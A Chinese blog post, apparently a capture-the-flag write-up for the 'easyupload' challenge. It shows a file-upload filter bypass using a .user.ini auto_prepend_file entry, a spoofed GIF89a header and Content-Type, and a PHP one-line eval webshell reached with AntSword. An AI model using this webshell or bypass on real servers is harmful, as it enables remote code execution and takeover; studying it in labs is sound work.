攻防世界 easyupload

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行

点开链接

在这里插入图片描述

我们直接上传一句话木马

在这里插入图片描述

发现上传不了

说明可能被过滤了

所以我们需要绕过

绕过的点为检查后缀中是否有htaccess或ph

思路:

通过上传.user.ini以及正常jpg文件来进行getshell

.user.ini文件

解题前我们先了解下.user.ini文件

指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:

auto_prepend_file=01.gif

01.gif是要包含的文件。

所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

具体可以参考以下文章

.user.ini文件构成的php后门

回到题目

先建立.user.ini文件如下:

GIF89a                  
auto_prepend_file=a.jpg      

注:文件头部的 GIF89a是为了绕过文件头内容检测,auto_prepend_file方法表示在php程序加载应用程序前加载指定的ph文件,其作用相当于php代码 require 或 include,这两方法可以文件包含嘛,就是包含的文件不存在就报错,存在的话直就行,不管你后缀是不是php,只有内容含有php代码就执行。

上传文件,用burpsuite抓包

将Content-Type改为image/jpeg

在这里插入图片描述

放行,发现文件上传成功

在这里插入图片描述

然后我们要上传一句话木马

构造php

GIF89a   
<?=eval($_POST['a']);?>

用cmd命令

合成图片的一句话木马

在这里插入图片描述

上传a.jpg,burpsuite抓包

发送到repeater

修改filename为a.php

将auto_pretend_file=a,jpg

修改为<?=eval($_POST['a']);?>

send一下

在这里插入图片描述

说明上传成功

F12打开调试器选择网络查看上传文件的地址

在这里插入图片描述

如图所示上传地址为:****/uploads/index.php

用蚁剑连接

在这里插入图片描述

在根目录下找到flag

在这里插入图片描述

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值